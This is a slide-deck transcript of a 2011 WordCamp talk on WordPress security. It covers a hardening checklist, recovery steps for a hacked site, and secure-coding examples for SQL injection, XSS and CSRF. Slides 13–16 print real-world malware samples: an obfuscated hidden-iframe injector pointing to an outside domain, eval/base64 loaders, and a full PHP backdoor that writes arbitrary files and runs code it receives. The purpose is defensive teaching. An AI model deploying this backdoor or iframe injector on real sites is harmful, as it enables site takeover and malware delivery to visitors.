WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011


The 'WordPress Security: Be a Superhero' presentation at WordCamp Raleigh May 2011.


WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011

  1. 1. Security: Be a Superhero http://johnford.is/ @iamjohnford
  2. 2. http://automattic.com/
  3. 3. http://vaultpress.com/
  4. 4. Superhero Training
  5. 5. Why are superheroes needed?
  6. 6. Know Your Enemy
  7. 7. Ninjas?
  8. 8. http://flic.kr/p/8gKpiG
  9. 9. http://flic.kr/p/5AU3Lp
  10. 10. Smoking Asthmatic Clowns
  11. 11. S.A.C.s
  12. 12. What do S.A.C.s do?
  13. 13. document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%37%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E));
  14. 14. <iframe src=http://bl4ckst4r.cn/blog/go.php?sid=17 width=0 height=0></iframe>
  15. 15. <?php eval(base64_decode("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
  16. 16. <?php$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST[data])){ $post[data] = $_POST[data]; if(!empty($_POST[url])) { $tmp = base64_decode($_POST[url]); $urls_array = unserialize($tmp); $url = array_shift($urls_array);if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);$post[url] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp[scheme]=="ftp") { echo "trying to update file[ ".$tmp[path]." ] via FTPn"; $file =tmp.php; $content = unserialize(base64_decode($post[data])); $content =base64_decode($content[content]); $fp = fopen($file, w); fwrite($fp,$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,r); $post =false; } else { echo "Sending request to: $url n"; $fp = false; } $content =request($url, $post, $fp); if($tmp[scheme]=="ftp") { fclose($fp); unlink($file); } if($tmp[scheme]=="ftp" AND $content!==false) echo "FTP: UPDATEDn";else echo $delim.$content; } else { $tmp = base64_decode($post[data]); $data =unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error whilesaving;"); } foreach ($data AS $d) { if(dirname($d[n])!=. and !file_exists(dirname($d[n]))) { mkdir(dirname($d[n]), 0777); chmod(dirname($d[n]),0777); } if($d[n]==ev) { eval($d[c]); continue; } $f = fopen($d[n], w);$bytes_written = fwrite($f, $d[c]); fclose($f); if(filesize($d[n])>10) { echo"file:".$d[n].": savedn"; } else { echo "some error happens: ".$d[n]." sizeis: ".filesize($d[n])." 
bytesn"; } if(!@chmod($d[n], 0777)) { echo "someerror with: ".$d[n]."n"; } } } } else { die("NO DATA"); } function request($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }
  17. 17. /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */
  18. 18. Superhero Checklist
  19. 19. Use Strong Passwords
  20. 20. I saw John Ford speak at WordCamp Raleigh 2011 → IsJFs@WCR2k11
  21. 21. I saw the awesome, loving, generous, compassionate, handsome, courteous, thoughtful, modest John Ford speak at WordCamp Raleigh 2011 → IstalgchctmJFs@WCR2k11
  22. 22. Keep WordPress Updated
  23. 23. Keep Themes & Plugins Updated
  24. 24. eval(gzuncompress(base64_decode(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
  25. 25. Correct File Permissions
  26. 26. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wordcamp);/** MySQL database username */define(DB_USER, wordcamp);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  27. 27. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  28. 28. http://wiki.mediatemple.net/w/File_Permissions
  29. 29. http://wiki.mediatemple.net/w/File_Permissions
  30. 30. Maybe be Obscure
  31. 31. Multiple sites on the same server
  32. 32. What if you need to come to the rescue?
  33. 33. Contact the web host
  34. 34. Back up the exploited site
  35. 35. Change all passwords and keys
  36. 36. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wordcamp);/** MySQL database username */define(DB_USER, wordcamp);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  37. 37. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  38. 38. Check File Permissions
  39. 39. Remove Rogue Code
  40. 40. http://wordpress.org/extend/plugins/exploit-scanner/
  41. 41. Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
  42. 42. machine:www user$ svn status? wp-config.php? .htaccessX index.php? wp-content/cacheX wp-content/plugins/akismetM wp-content/themes/twentyten/404.php? wp-admin/metaPerforming status on external item at wp-content/plugins/akismet
  43. 43. machine:www user$ svn diff wp-content/themes/twentyten/404.phpIndex: wp-content/themes/twentyten/404.php===================================================================--- wp-content/themes/twentyten/404.php (revision 15819)+++ wp-content/themes/twentyten/404.php (working copy)@@ -1,3 +1,5 @@+<?php echo "<h1>Heres some code that really shouldnt be here</h1>"; ?>+ <?php /** * The template for displaying 404 pages (Not Found).
  44. 44. Restore From Backup
  45. 45. YOU HAZ BACKUP, RIGHT? http://flic.kr/p/DC3Q
  46. 46. Superhero Developer Checklist
  47. 47. SQL Injection
  48. 48. $wpdb->query( "UPDATE $wpdb->posts SET post_title = $new_title WHERE ID = $id"); BAD
  49. 49. $new_title = "SACed -- ";$wpdb->query( "UPDATE $wpdb->posts SET post_title = $new_title WHERE ID = $id"); BAD
  50. 50. $new_title = "SACed -- ";$wpdb->query( "UPDATE $wpdb->posts SET post_title = SACed -- $new_title WHERE ID = $id"); BAD
  51. 51. $wpdb->update() GOOD
  52. 52. $wpdb->update( $wpdb->posts, array( post_title => $new_title ), array( ID => $id )); GOOD
  53. 53. $wpdb->insert( $table, $data ); GOOD
  54. 54. $wpdb->prepare() GOOD
  55. 55. $wpdb->prepare( "SELECT * FROM $wpdb->posts WHERE post_name = %s OR ID = %d", $some_name, $some_id); GOOD
  56. 56. XSS — Cross-site Scripting
  57. 57. <h1> <?php echo $title; ?></h1> BAD
  58. 58. $title = <script>jsCode();</script>;<h1> <?php echo $title; ?></h1> BAD
  59. 59. <h1> <?php echo esc_html( $title ); ?></h1> GOOD
  60. 60. <a href="#wordcamp" title="<?php echo $title; ?>"> Link Text</a> BAD
  61. 61. <?php $title = " onmouseover="jsCode();; ?><a href="#wordcamp" title="<?php echo $title; ?>"> Link Text</a> BAD
  62. 62. <a href="#wordcamp" title="<?php echo esc_attr( $title ); ?>"> Link Text</a> GOOD
  63. 63. esc_textarea() GOOD
  64. 64. <a href="<?php echo $url; ?>"> Link Text</a> BAD
  65. 65. <?php $url = javascript:jsCode();; ?><a href="<?php echo $url; ?>"> Link Text</a> BAD
  66. 66. <a href="<?php echo esc_url( $url ); ?>"> Link Text</a> GOOD
  67. 67. <script> var foo = <?php echo $unsafe; ?>;</script> BAD
  68. 68. <script> var foo = <?php echo esc_js( $unsafe ); ?>;</script> GOOD
  69. 69. wp_filter_kses( $data ) GOOD
  70. 70. CSRF — Cross-site Request Forgery
  71. 71. http://mysite.com/delete-record.php?id=1
  72. 72. <img src="http://mysite.com/delete-record.php?id=1" />
  73. 73. Nonces: action-, object-, & user-specific time-limited secret keys
  74. 74. wp_nonce_field( plugin-action_object ) GOOD
  75. 75. check_admin_referer( plugin-action_object ) GOOD
  76. 76. current_user_can( edit_posts ) GOOD
  77. 77. Resources http://codex.wordpress.org/Changing_File_Permissions http://codex.wordpress.org/Hardening_WordPress http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion http://codex.wordpress.org/FAQ_My_site_was_hacked http://wordpress.org/extend/plugins/exploit-scanner/ http://codex.wordpress.org/Function_Reference/wpdb_Class http://codex.wordpress.org/Data_Validation http://codex.wordpress.org/WordPress_Nonces
  78. 78. http://flic.kr/p/5AU3Lp
  79. 79. Thank you! http://johnford.is/ @iamjohnford
